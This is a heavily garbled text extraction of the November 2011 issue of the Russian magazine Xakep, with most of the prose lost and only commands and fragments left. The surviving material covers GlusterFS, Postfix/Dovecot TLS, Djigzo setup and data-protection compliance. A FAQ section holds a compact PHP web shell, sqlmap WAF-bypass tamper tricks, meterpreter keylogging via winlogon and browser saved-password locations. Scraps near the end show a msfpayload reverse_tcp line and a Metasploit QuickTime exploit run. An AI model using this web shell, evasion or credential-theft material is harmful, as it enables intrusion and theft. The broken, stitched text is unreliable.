GlusterFS
,
RAID.
, , , ( ,
). :
# gluster volume set new_volume auth.allow 192.168.0.*
GlusterFS
Brick3: 192.168.0.3:/data
Brick4: 192.168.0.4:/data
, ,
/
data .
Replicated , RAID1. ,
. :
# gluster volume create new_volume replica 2 transport
tcp 192.168.0.1:/data 192.168.0.2:/data
,
( ), /data.
, ,
, :
# gluster volume start new_volume
Starting volume new_volume has been successful

GlusterFS : glusterfs-, GlusterFS, NFS-, , CIFS,
Windows. ,
:
# mkdir /mnt/new_volume
# mount -t glusterfs 192.168.0.1:/new_volume \
/mnt/new_volume
new_volume /mnt/new_
volume.
Striped
, RAID1. Distributed,
, , ,
/ . :
# gluster volume create new_volume stripe 2 transport tcp
192.168.0.1:/data 192.168.0.2:/data

Distributed Striped-.
( 2 stripe
) ,
:
# gluster volume create new_volume stripe 2 transport tcp
192.168.0.1:/data 192.168.0.2:/data 192.168.0.3:/data
192.168.0.4:/data

11 /154/ 2011
127
SYN/ACK
, - (volfile),
.
, , , ( GlusterFS
, ,
).
,
/etc/fstab :
192.168.0.1:/new_volume glusterfs defaults,_netdev 0 0
,
FUSE (, Solaris OpenBSD), NFS- ( TCP):
# mount -o mountproto=tcp -t nfs 192.168.0.1:/new_volume
/mnt/new_volume
3. :

/etc/fstab:
192.168.0.1:/new_volume /mnt/new_volume nfs defaults,
_netdev,mountproto=tcp 0 0
GlusterFS-
Windows,
Samba-,
CIFS. ,
samba GlusterFS-
( ), glusterfs-, /etc/samba/smb.conf
:
[gluster]
comment = Gluster volume
path = /mnt/new_volume
read only = no
guest ok = yes
samba:
# /etc/init.d/samba restart
Windows.
,

, GlusterFS-
: ,
, .. ?
: ,
. ,
, :
1.
gluster peer probe:
# gluster volume rebalance new_volume start

Starting rebalance on volume new_volume has been successful

( ), :
1. :
# gluster volume add-brick new_volume 192.168.0.5:/data
2. ( 192.168.0.3
192.168.0.5):
# gluster volume replace-brick new_volume \
192.168.0.3:/data 192.168.0.5:/data start
Replace brick start operation successful
3. :
# gluster volume replace-brick new_volume \
192.168.0.3:/data 192.168.0.5:/data start
replace-brick commit successful
4. :
# gluster volume remove-brick test-volume \
192.168.0.3:/data
Removing brick(s) can result in data loss. Do you want
to Continue? (y/n)
Enter "y" to confirm the operation. The command displays
the following:
Remove Brick successful
5. :
# gluster peer detach 192.168.0.3

Probe successful
2. ( ):
# gluster volume add-brick new_volume 192.168.0.5:/data
Add Brick successful
128
, 5 ,
,
- .
, -
-. z
11 /154/ 2011
aka 13oz
. ,
152 , //
, 58- .
,

, , .

,
, , . , ().
, , , ,
.
ISPDN.RU,
.
,
.
, :
1. ;
2. ;
3. ;
4. ;
5.
;
6. ( ).
, .
? ( ),
( ) -
11 /154/ 2011
129
SYN/ACK

-,
,
www.gosuslugi.ru.
,
.
,
.
58-
. (,
), ?
. , (, ,
, , ,
). ,

, .
,
.

.
,
( , ), . , ,
, ,
, .
.

. ,
, .
,
, .
, :).
, - . ,
, . ?
. /
. ,

, , , .

. .

58-
. .
, , ,
( 10 ) , ,
.

.
. : 3, 2,
1.
. . . 4, ,
3,
2, ( www.wikisec.
ru ) 1.
- , . ,
, . ,
.

, -
130
Stonegate Firewall
11 /154/ 2011
MAC

ARP
IP

, .
-
. !
,
.
eth0
eth1
IPX
,
( - )
m
DMZ
-2
-2
-2

Windows Unix

(SPmon)
-2 ( npo-rtc.ru)

1. ;
2.
;
3. ;
4. ;
5. ;
6. ;
7. ;
8.
;
9.
;
10.
;
11. ;
12.
;
13. , ;
14. ,
,
;
15. ;
16. ;
17.
;
18.
.
11 /154/ 2011
, , (
)

.

- , ... .
, 152- ,

.
,
,
. ,
,
( ).
.

- .
?
, , .
.
.

. -
, , , . :
1. ...
,
;
2. , . :

. ,
. ;
3. ,
,
. .
, .
, ,
, .
, ,
131
SYN/ACK
( ),
(), VPN.
,
,

1 . ( ) 1.
,
, , .

,
.
:
1. ( )
2.
3. ( VPN-).
? , ( ),
.
.
:
1. Dallas Lock;
2. NT;
3. Secret Net;
4. Windows 7.
,
, . Dallas Lock
, - AD. .
NT ,
AD .
Secret Net (, ) .
,
,
,
,

.
?
,
:). , ,
- .

, , .
:
1. -2;
2. ;
3. VipNet (Personal Firewall Office Firewall, VipNet Client);
4. Trust Access;
5. Stonegate Firewall/VPN.
, . ,
. ,

, ,
.
-
132
( )
VipNet Custom ( )

, ,
,
.
,
,
,
.
11 /154/ 2011
. VipNet VipNet Client

VPN- VipNet Custom,
VPN, . , , ,
Trust Access .
? VipNet
VipNet Personal Firewall,
, VipNet Office Firewall,
. .
, . ,
. . Trust Access , -,
, , Kerberos.
, , , ,
.

-2 , FreeBSD. ,
, . .
, IP- ,
. ,
, -,
.

- ,
. , VPN, .
FreeBSD .
. .

3. VPN,
.
Stonegate Firewall/VPN ,
, , . ,
,
.
,
,
. ,
.

Cisco, PIX Firewall .
.
, , .
VPN:
-PRO . -

, ,
,

11 /154/ 2011
,

?
.
, . ,
,
, 1
.
, , Safe-Line.
VPN-:
1. VipNet Custom;
2. .
,
VipNet Custom. , . :
VipNet Coordinator ( Windows Linux),
VipNet Client (Windows only) ( Windows). : ,
, ,
.
, . ,
. (
, :)) ,
. !
VipNet-.
,
, .
, , .
,
, , VPN-,
, .
, , ,
.

, ,
.
, (. ).
, ,
: ?
,
.
. 9, 3 3
(), 2 (
), 1 (
). , , ,
1: , 1
1, ,
( ,
). , , 1 8
,
. . z
133
SYN/ACK
grinder (grinder@tux.in.ua)
- ,
,
. . ,
.
,
. ,
.
?
134
INFO
WWW
,
Postfix
TLS,
,
ldd /usr/libexec/
postfix/smtpd

.
libssl,

.
Postfix
postfix.org/
postconf.5.html
C Dovecot dovecot.org
Djigzo
djigzo.com
,
ARPANET, .
, ,
. , ,
. ,
, .
,
,
(pass-the-hash).
.
.

PGP/GPG S/MIME.
,
Enigmail, FireGPG, APG (Android Privacy Guard)
. : ,
, .
: ,
. : ,
. ,

.
, , .
SMTP/POP3/IMAP
. ,
.
.
VPN .
, .
11 /154/ 2011
Postfix Ubuntu TLS
Djigzo
OpenSource- Djigzo (djigzo.

com) , DLP (Data Leak Prevention). ,
,
.
, . ,
TLS, ,
, . :
TLS POSTFIX

TLS (Transport Layer Security), ,
,
. ,

. Postfix,
, Exim, Sendmail
.
TLS : Postfix SSL,
TLS main.cf. , Postfix
TLS ( ) , "ldd /
usr/sbin/postfix" .
libssl, .
Ubuntu, .
TLS
postfix-tls.
:
$ sudo aptitude install postfix
() . ,
sudo dpkg-reconfigure postfix : ,
( root postmaster), ,
, , ,
. . ,

/etc/postfix/main.cf postconf -e,
.\
:
( /
etc/ssl). ,
, ,
Postfix /etc/ssl/openssl.
cnf. .
, ,
, .
Postfix main.cf ,
11 /154/ 2011
$ sudo nano /etc/postfix/main.cf

# TLS parameters
#
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert.key
# TLS
smtpd_use_tls=yes
#
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
# , ,
TLS
# smtpd_tls_auth_only = yes
#
# may,
encrypt
smtp_tls_security_level = may
smtpd_tls_security_level = may
#
smtp_tls_note_starttls_offer = yes
smtpd_tls_loglevel = 1
#
# smtpd_tls_received_header = yes
smtpd_tls_session_cache_timeout = 3600s
#tls_random_source = dev:/dev/urandom
,
, smtpd_banner. ,
, . :
$ sudo service postfix restart
25- .
$ telnet localhost 25
ehlo localhost
, 250-STARTTLS. ,
TLS . SASL . ,
, tcpdump.
, : Postfix
25- , TLS.
135
SYN/ACK
Dovecot
netstat ,
, .
SMTPS-
( 465). , (,
), SMTP
. : /etc/postix/
master.cf :
# }
# protocol pop3 {
# listen = *:10100
# ..
# }
# , "" required
ssl = yes
#
ssl_cert_file = /etc/ssl/certs/dovecot.pem
ssl_key_file = /etc/ssl/private/dovecot.pem
# ,
#ssl_key_password =
#
#ssl_ca_file =
#
#ssl_verify_client_cert = yes
#ssl_cert_username_field = commonName
#ssl_parameters_regenerate = 168
#ssl_cipher_list = ALL:!LOW:!SSLv2
#
#verbose_ssl = yes
$ sudo nano /etc/postix/master.cf

smtps inet n - - - - smtpd
-o smtpd_tls_wrappermode=yes
# -o smtpd_sasl_auth_enable=yes
# -o smtpd_client_restrictions=permit_sasl_
authenticated,reject
, 25-, 465- .
, , .
DOVECOT
-,
POP3 IMAP, Dovecot (dovecot.org),
Courier (courier-mta.org) Cyrus (cyrusimap.org).
(POP3S IMAPS),

.
Dovecot. ( , Ubuntu dovecotpostfix, ):
$ sudo aptitude install dovecot-pop3d dovecot-imapd
, .
, netstat ,
.
, , ,
. :
$ sudo nano /etc/dovecot/dovecot.conf
listen = *
protocols = pop3 pop3s imap imaps
#
# protocol imap {
# listen = *:10143
# ssl_listen = *:10943
# ..
136
:
$ sudo service dovecot restart
netstat , 110/995 (POP3/S) 143/993 (IMAP/S). ,
tcpdump. , , (SquirrelMail, RoundCube, Open
WebMail ), HTTPS.
DJIGZO
, ,
.
- .
OpenSource- Djigzo Email Encryption Gateway, DLP (Data Leak Prevention) .
, ,
.
*nix , Java 6
Postfix. Ubuntu/Debian, RedHat/CentOS,
VMware, Hyper-V.
11 /154/ 2011
Deb- Djigzo
Djigzo
, S/MIME. PDF
.
(
SMS).
(EJBCA, Microsoft CA)
Verisign Comodo. ,
. Djigzo
, , .
DKIM (DomainKeys Identified Mail).
BlackBerry Android,
Djigzo S/MIME
.
-. : Djigzo ,
( ).
, ,
Ubuntu/Debian, .
deb- rpm- :
, Postfix, 10025-
, Djigzo. ,
Postfix
,
. , Djigzo , , . Tomcat,
:
$ sudo nano /etc/default/tomcat6
JAVA_OPTS="$JAVA_OPTS -Ddjigzo-web.home=/usr/share/djigzo-web"
JAVA_OPTS="$JAVA_OPTS -Djava.awt.headless=true -Xmx256M"
TOMCAT6_SECURITY=no
, :
$ sudo chown tomcat6:djigzo /usr/share/djigzo-web/ssl/
sslCertificate.p12
, HTTPS- Tomcat:
$ sudo apt-get install postgresql postfix openjdk-6-jre

openjdk-6-jre-headless tzdata-java ant ant-optional
mktemp wget libsasl2-modules tomcat6
$ wget -c http://djigzo.com/downloads/djigzo-release-2
.1.1-1/djigzo_2.1.1-1_all.deb
$ wget -c http://djigzo.com/downloads/djigzo-release-2
.1.1-1/djigzo-web_2.1.1-1_all.deb
$ sudo dpkg -i ./djigzo_2.1.1-1_all.deb ./dpkg -i \
djigzo-web_2.1.1-1_all.deb
$ sudo apt-get -f install
$ sudo cp /usr/share/djigzo-web/conf/tomcat/server-T6.xml \
/etc/tomcat6/server.xml
, .
, ,
/etc/sudoers. /etc/postfix , :
$ sudo service tomcat6 restart
$ cd /etc/postfix
$ sudo mv djigzo-main.cf main.cf
$ sudo mv djigzo-master.cf master.cf
Djigzo Postfix, . :
$ cat cat /etc/postfix/main.cf
content_filter = djigzo:127.0.0.1:10025
11 /154/ 2011
Djigzo:
$ sudo nano /etc/tomcat6/Catalina/localhost/djigzo.xml
<Context docBase="/usr/share/djigzo-web/djigzo.war"
unpackWAR="false"/>
:
https://localhost:8443/djigzo, , admin, admin.

- Djigzo . , ( Djigzo:
), , (CRL),
.
: ,
.
. z
137
UNITS / FAQ UNITED
FAQ United

FAQ@REAL.XAKEP.RU

. ,

:
MYSQL, ,
NOSQL, .

.
:).
, ,

.
, ,
.
, , ,

. Sphinx
(sphinxsearch.com). ,
. ,
,

Craigslist.org.
, .
: 200 000 000
! 2 000 .
Sphinx
.

. SphinxAPI
.
SphinxQL,
SQL.
,
,
(
):

(10-15 );
( ( 1.2 ) 500+
2 ).
Sphinx
SQL , NoSQL . , !

PHP-,

EVAL()?
,
(h.ackack.net/tiny-php-shell.

$_. ,

PHP-,
copypaste.php?1=shell_exec&2=whoami, shell_exec,

whoami.
Q
A
64-
32- (X86)?
execute:
execute H c f
"C:\\WINDOWS\\Sysnative\\notepad.exe"
,
(
notepad.exe), 32- , 64- .
.
html):
<?=($_=@$_GET[2]).@$_($_GET[1])?>
, PHP . , :
1. $_=@$_GET[2]
2. @$_($_GET[1])
. GET- 2
$_.
GET- 1,
. ,

WAF/IDF. ,
?
,
: PHPIDS
(phpids.org) ModSecurity (www.modsecurity.
org). ,

( sqlmap')
WAF.

, ,
5 : METASPLOIT

Metasploit,

.
,
Ophcrack (ophcrack.sourceforge.net).
?
?
138
,
.
Metasploit Framework
.
,
meterpreter keyscan_dump,
, .
,
<LWin>
<L>, ,
,
. , . ,
, , , ,
, !
11 /154/ 2011
FAQ UNITED
. ,
WAF. 0day-
- .
ModSecurity ,

, ,
. :
,
( ,

),
WAF.
MALWARE- ANDROID
Q
A
, ANDROID ?
Android .
, , ,
, .
. ,
,
.
1. , Android dex- Java
class, Dex2jar (code.google.com/p/dex2jar). dex- apk, ,
.
2. jar-, Java JD-GUI (java.decompiler.free.fr).
sendTextMessage(), . , , SMS.

( MCC, Mobile Country Code).
, ,
.
Android,
.

WAF?
WAF
,
- .
.
sqlmap,
tampering-.
, randomcomments.py
inline-,
SQL (, SELECT
SEL/**/E/**/CT). , (
SELECT ..).
unmagicquotes.py
magic_quotes
(, 1' AND =1 1%bf%27
AND 1=1--%20).
versionedkey words.py
WAF/IDF (UNION ALL SELECT
*!UNION*//*!ALL*//*!SELECT*/).
( sqlmap 24)
,
, WAF.
BACKTRACK,
HACK?
, ,
,
update:
/usr/bin/apt-get -y update
/usr/bin/apt-get -y upgrade
JD-GUI .JAVA-,
.
winlogon (
)
.
, ,

. . , meterpreter
winlogon.
11 /154/ 2011
, ,

.

.
meterpreter winlogon,
.
,
Lockout_Keylogger,
.
,
( )
.
,
.
139
UNITS / FAQ UNITED
2.
Root', (/
etc/ssh/sshd_config) :
PermitRootLogin no.
3. ,
SSH, .

AllowUsers <username>. wildcard'
(* ?). ,
- :
AllowGroups <groups>.
4. -
. -
Port-knocking,
SSH-
5. ,
IP ( hosts.allow)

.
Selenium IDE
apt-get dist-upgrade
, :
apt-get update && apt-get dist-upgrade -y
. security-
:
/pentest/exploits/fast-track.py -i

-?
,

- , Selenium (seleniumhq.
org).
,

,
Yac.

,
.
Selenium IDE
Firefox, .
,
,
.
SSH
?
1.
private-public .

, ..
140
, (WINDOWS
7) -
- .

,
. -
?

AntiFreeze (resplendence.com/antifreeze_
os). -,
, ,
.
,
,
, -
.
,
. , AntiFreeze

ALT+CTRL+WIN+HOME.

SQL, SQLMAP,
?
(
Acunetix WVS, www.acunetix.com).
, :
Sqlninja (sqlninja.sourceforge.net);
Pangolin 3.2.3 free edition (www.nosec.org/en/
pangolin_download.html);
Havij v1.14 Advanced SQL Injection (itsecteam.
com/en/projects/project1.htm);
SQL Power Injector (www.sqlpowerinjector.com);
SQLIer 0.8.2b (bcable.net/releases.php?sqlier);
bsqlbf-v2 (code.google.com/p/bsqlbf-v2);
SCRT Mini-MySqlat0r (www.scrt.ch/attaque/
telechargements/mini-mysqlat0r);
Safe3 Sql Injector (sourceforge.net/projects/
safe3si);
Marathon Tool (www.codeplex.com/

marathontool);
Absinthe (www.0x90.org/releases/absinthe);
pysqlin (code.google.com/p/pysqlin);
WITOOL (witool.sourceforge.net);
sqlus (sqlsus.sourceforge.net);
Toolza (bit.ly/rihToZ).
...
Firefox
Sqlite,
signons.sqlite.
Triple-DES BASE64.

,
:
[Windows XP]
C:\Documents and Settings\<user_name>\
Application Data\Mozilla\Firefox\
Profiles\<random_name>.default
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\
Mozilla\Firefox\Profiles\<random_name>.
default
Google Chrome, Firefox, sqlite Login Data,
:
[Windows XP]
C:\Documents and Settings\<user_name>\
Local Settings\Application Data\Google\
Chrome\User Data\Default
[Windows Vista & Windows 7]
C:\Users\<user_name>\Appdata\Local\
Google\Chrome\User Data\Default
Opera
. Wand.dat :
C:\Documents and Settings\<username>\
Application Data\Opera\Opera\wand.dat
[Windows Vista/Windows 7]
C:\users\<username>\AppData\Roaming\
Opera\Opera\wand.dat
Internet Explorer
URL :
HKEY_CURRENT_USER\Software\
Microsoft\Internet Explorer\
IntelliForms\Storage2

FirePasswordViewer, FirePassword, Chrome
PasswordDecryptor, OperaPasswordDecryptor,
IEPasswordDecryptor. securityxploded.com. z
11 /154/ 2011
>Security
0x4553-Intercepter 0.84
Angry IP Scanner 3.0. beta
AxCrypt 1.7
cudadbcracker
DDOS Tracer 1.0
FBPwn 0.1.6
Fpipe 2.1
knock 1.5
ModSecurity 2.6.2
NetworkMiner 1.1
Ophcrack 3.3.1
Process Hacker 2.22
ProcHeapViewer 3.5
Registry Decoder
Remove Fake Antivirus 1.80
>Net
AirDC++ 2.20
AppSnap 1.3.3
BTProximity
Dropf
Elite Proxy Switcher 1.16
FileHippo Update Checker 1.038
Fresh FTP 5.45
NameBench 1.3.1
Network Activity Indicator 0.9.0
QckTwit 0.9.5.1
Remote Desktop Manager 6.5.1.0
RusRoute 1.8.2
TapinRadio 1.0
WinSCP 4.3.5
Wireless Network Watcher 1.31
Witty 2.0.4
>Multimedia
DVDFab Passkey Lite 8.0.3.9
EPNamer 2.0.0
Free Screen To Video 2.0.0.0
MakeMKV 1.6.15
Personal Activity Monitor 0.1.4
PhotoBooth
PhotoFilmStrip 1.4.4
ProgDVB 6.72.1
Screenshot Captor 2.102.01
STDUViewer 1.6.62
UMPlayer 0.98
>Games
Secret Maryo Chronicles 1.9
>>WINDOWS
>Development
Android SDK R13
Dev-C++ 4.9.9.2
Eclipse 3.7.1
Eclipse PDT 2.2.0
IETester 0.4.11
ILMerge 2.11.0923
PSPad 4.5.4
Qt Creator 2.3.1
SharpDevelop 4.1
SqlDbx 3.51
TLS Lite 0.3.8
TortoiseSVN 1.6.16
WampServer 2.2a
XAMPP 1.7.4
>>MAC
Changes Meter 1.7.7
eMaps 2.3.6
Funter 1.0.0
Get Tube 5.0
Google Books Downloader 1.0
InerziaMode 1.4
iPlayer+ 2.0.2
LotsaSnow 1.5
MacPorts 2.0.3
Moroshka File Manager 1.0.54
MPlayerX 1.0.9
Scroll Reverser 1.4.4
SyncTwoFolders 1.7.6b1
Syrinx 2.4.7
TCPBlock 2.9
Teleport 1.1
Tincta 1.1
Wunderlist 1.2.4
Wyse PocketCloud 2.0.7s
X Lossless Decoder 20110924
>System
Console 2.00
CPU-Z 1.58
Double Commander 0.5.0
Driver Sweeper 3.2.0
DriverBackup 2.1
DVD Flick 1.3.0.7
Fast Folder Eraser
PC Usage Viewer 1.0
RAM CPU Taskbar 1.6.2
SARDU 2.0.3
SyncToy 2.1
UltraDefrag 5.0.0 beta3
UNetbootin 5.55
WinDirStat 1.1.2
WinDjView 1.0.3
WinMerge 2.12.4
>Misc
AutoClipX 1.9.0.0
ControlPad 0.72
Feewhee 1.3
Free Countdown Timer 2.3
Free Studio 5.2.1
GymNotes 1.3.1.740
Handy Shortcuts
MapKeyboard 1.2
Menu Uninstaller 1.2.3
MouseFighter 5.6
Rainbow Folders 2.05
Smart UAC
Touchpad Blocker 1.5
USBFlashSpeed
USBGrab
Volume2 1.1.1
soapUI 4.0.1
SUPERAntiSpyware 5.0.1128
USB Dummy Protect 1.1
USB Hidden Folder Fix 1.1
VISDA
wavsep 1.0.3
WipeFile 2.1.1
XCat
>Security
Dacs 1.4.26
>Net
Aria2 1.12.1
CheckGmail 1.13
EiskaltDCPP 2.2.4
Empathy 3.2.0
Esniper 2.26.0
Filezilla 3.5.1
Firefox 7.0.1
Frostwire 5.1.5
Midori 0.4.0
Minitube 1.5
Mumble 1.2.3
Opera 11.51
Pidgin 2.10.0
Rtorrent 0.8.9
Ssvnc 1.0.29
Thunderbird 7.0.1
Turpial 1.5.0
WebHttrack 3.44.1
>Games
AssaultCube 1.1.0.4
Hedgewars 0.9.16
OpenClonk 5.2.0
>Devel
Aptana 3.0.5
Boost 1.47.0
ClanLib 2.3.3
Clojure 1.3.0
Clutter 1.8.0
dhtmlxGantt 1.3
GMP 5.0.2
GTK+ 3.2.0
jQuery 1.6.4
Juce 1.5.3
Maatkit 7540
MantisBT 1.2.8
MonoDevelop 2.6
QtCreator 2.3.1
Rails 3.1
Shogun 1.0.0
>>UNIX
>Desktop
AfterStep 2.2.11
aTunes 2.1.0
BombonoDVD 1.0.2
Deja-Dup 20.0
Diffuse 0.4.4
ffDiaporama 1.0.0
GNOME 3.2
GnoMenu 2.9.1
Gobby 0.4.94
Granola 4.0.1
Grsync 1.2.0
HomeBank 4.4
Interceptor 1.2.9
Kile 2.1
LibreOffice 3.4.3
Rodent 4.7.2
Subsonic 4.5
Terminator 0.96
WatchVideo 2.2.1
>X-distr
Calculate Linux 11.9
FreeNAS 8.0.1
Linux Mint 11
>System
AMD Catalyst OpenGL 8.88.8
BleachBit 0.9.0
Bootchart 0.9
Clonezilla 1.2.10-14
Computer-janitor 2.1.0
Coreutils 8.13
LimitCPU 1.4
Linux Kernel 3.0.4
Nut 2.6.2
Nvidia 285.05.09
OpenNebula 3.0.0
Parcellite 1.0.2rc5
PulseAudio 1.0
Q4Wine 0.121
Systemd 36
TruPax 4
VirtualBox 4.1.4
>Server
Apache 2.2.21
Asterisk 1.6.2.20
BIND 9.8.1
CUPS 1.5.0
DHCP 4.2.2
Dovecot 2.0.15
Freeradius 2.1.12
Lighttpd 1.4.29
MiniDLNA 1.0.22
MySQL 5.5.16
Nsd 3.2.8
OpenLDAP 2.4.26
OpenVPN 2.2.1
Postfix 2.8.5
PostgreSQL 9.0.5
Samba 3.6.0
Sendmail 8.14.5
Snort 2.9.1
Squid 3.1.15
Syslog-ng 3.3.1
Vsftpd 2.3.4
FBPwn 0.1.6
Inguma 0.4
knock 1.5
Lsat 0.9.7.1
Lutz 0.8.1
Malheur 0.5.2
ModSecurity 2.6.2
netsniff-ng 0.5.6
Packetfence 3.0.1
pfSense 2.0
Sam 0.6.0
SAMHAIN 2.8.6
soapUI 4.0.1
Sshguard 1.5
Stunnel 4.44
THC-HYDRA v7.1
tsakwaf 0.9.1
wavsep 1.0.3
XCat
Zoneminder 1.25.0
11(154) 2011

!
800
!
191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .
8.5
DVD
!
!
,
, :

+ DVD
Total Football
+ DVD
DVD
+ DVD
DVDXpert
+ DVD
Smoke

,

.
PC
+ 2 DVD
+ DVD
T3
Digital Photo
+ DVD
+ DVD
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
UNITS /
Dropbox

Dropbox,

092
20 , BUSINESS INSIDER
25 000 000
300 000 000
2008
2009
10
2010

Dropbox

5 ,
14
144

Dropbox

2011
2011
20%
69 Dropbox

35

Python
32.7
6.7
6.5
4.7
4.0
3.5
3.2
2.8
$1 149
35%
, . .
$4 000 000 000
25
Amazon EC2+S3:

Dropbox
2010 Dropbox
$300 000 000
7 Dropbox
.
$100 000 000
100 000 000 000
0,1
$7 200 000
Dropbox
iPhone
iPad
Android
BlackBerry
+400

Python

90%
66,1%
7,4%
20,9%
2,6%
2,0%
0,3%
11 /154/ 2011
>> coding
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Хакер 2011 11 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 11 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

SSL:

STEVEN PAUL JOBS (1955-2011)

WINDOWS 8 DEVELOPER PREVIEW

$40 000 FACEBOOK

WEXLER.HOME 903 Windows 7 .

Intel Core i5-650 3,2 - 4 . CPU

GeForce GTX 460,

1 023 GOOGLE IBM. .

3 . DIRT 3 AMD. AMD4u.com.

360 , , Trojan.Mebromi Symantec.

, BIOS. , Icelord. 2007 :

INTEL GOOGLE Android Intel.

SKYPE . App Directory 30 .

WINSTON XSTYLE WINSTON

Dell UltraSharp U2711

iiyama ProLite X2472HD-1

NEC MultiSync EA232WMi

Pixel Persistence Analyzer

APPLE LED CINEMA DISPLAY

DELL ULTRASHARP U2711

IIYAMA PROLITE X2472HD-1

Apple LED Cinema

NEC MULTISYNC EA232WMI

LINKSTATION PRO DUO

LINKSTATION PRO QUAD

GAMETRIX TRUE LIVE SENSE

DISKPART> select vdisk file="d:\Virtual Machines\Win8.vhd"

DISKPART> select vdisk file=d:\VMs\

Sublime Text 2. Mac

"fallback_encoding": "Western (Windows

1. PAM- Google Code :

WebSockets, websocket-js WebSockets, Adobe Flash.

VNC (Virtual Network Computing)

ICMP REDIRECT MITM DNS OVER ICMP MITM

SSL MITM. 0x4553-NAT

SSL Strip favicon

GreenDog , Digital Security (twitter.com/antyurin)

LFI (Local File Inclusion) ,

- NTFS (Alternative Data Stream,

, . , *nix (UFS) (hardlink) ,

mklink link_file.txt test.txt:secrets.txt

fsutil hardlink create _ _

Vista, mklink c '/h':

- Windows. *nix. Windows .

./msfpayload windows/meterpreter/reverse_tcp LPORT=5555 R

LEA EDX,DWORD PTR SS:[ESP+38]

LEA EDX,DWORD PTR SS:[ESP+20]

$ curl -I -H "Range: bytes=0-1,0-2" -s www.example.com/

206 Partial Content,

proxy_set_header Range "";

%{HTTP:Range} bytes=0-[0-9]+, [NC,OR]

RewriteCond %{HTTP:Range} bytes=0-.* [NC]

Apple QuickTime PICT

MOV EAX,DWORD PTR DS:[ECX]

n edi , access violation. SEH- -

space extra (fixed point)

msf exploit(apple_quicktime_pnsize) > set CMD calc.exe

msf exploit(apple_quicktime_pnsize) > exploit

msf > use exploit/windows/fileformat/apple_quicktime_pnsize

Linux Kernel < 2.6.36.2 Econet Privilege

Pr0xor (php.m4sql@gmail.com, rdot.org/forum)

EMS SQL Manager

((WORD)Buffer + 0xba) = Seed;